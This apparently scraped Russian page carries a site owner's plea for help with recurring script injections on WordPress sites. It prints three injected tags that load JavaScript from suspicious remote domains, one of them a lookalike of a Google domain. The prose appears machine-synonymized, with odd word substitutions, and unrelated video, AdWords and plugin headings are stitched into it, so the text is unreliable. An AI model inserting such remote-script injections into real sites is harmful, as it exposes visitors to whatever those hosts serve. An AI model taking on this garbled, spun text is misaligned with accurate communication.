Вирусы Wordpress. Как проверить тему Вордпресс на вредоносный код.

Опубликовано: 29.03.2017

видео Вирусы Wordpress.  Как проверить тему Вордпресс на вредоносный код.

#СпроситеAdWords: Что делать, если сайт заблокирован за вредоносное ПО?

Всем привет. Началось все месяца 3 вспять, лето, когда мои веб-сайты еще лежали на хостингах. Решил подредактировать старенькые записи на одном из веб-сайтов и увидел в коде вот таковой скрипт (сходу несколько вариантов, на различных веб-сайтах был различный код, малость подредактировал):



script src=//shareup.ru/social. js>script
script src=//css. googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2>script
script type=text/javascript src=//uptoliked.ru/widjets. js>script

Код оказался в каждой записи и на каждой странички, вставлен рандомно в различные места.
Почистил все записи через подмену в БД, на данный момент вот вызнал про плагин, который отыскивает и делает автозамену во всех записях и страничках, плагин — search regex. В общем, сменил тогда все пароли в админке, пароли к БД, обновил все движки и плагины, перенес веб-сайты на ВПС. При этом тогда лишь на одном хостинге пострадали веб-сайты, на втором было все нормально. Проделав все это, я успокоился, до нынешнего денька…


Удаляем вредоносный код на сайте WordPress. Плагин ТАС.

Сейчас вновь нашел эти коды, кое-где на 7 из 10 веб-сайтов, при этом коды были вставлены даже на новых веб-сайтах, где стоит только админка и нет никаких плагинов и эти веб-сайты не лежали ранее на моем хосте! Т.е. версия, что коды идут через плагины, думаю, отпадает. Точно как-то это все просачивается через запросы к БД, но как? Ведь пароли стоят новые — генерированные. Написал в поддержку ВПС, там подтвердили факт наличия таковой неудачи у меня, но посодействовать не смогли, произнесли, что нужно включать бинарный лог mysql, но это будет писаться каждый запрос к БД каждого веб-сайта и эти логи будут гигабайтных размеров.

Мыслей как избавиться нет, ну и не очень понятно что делают эти коды, что-то точно они подгружают… А ах так они сами подгружаются? Люди добрые, подскажите как эта дрянь может просачиваться и как ее уничтожить раз и навечно?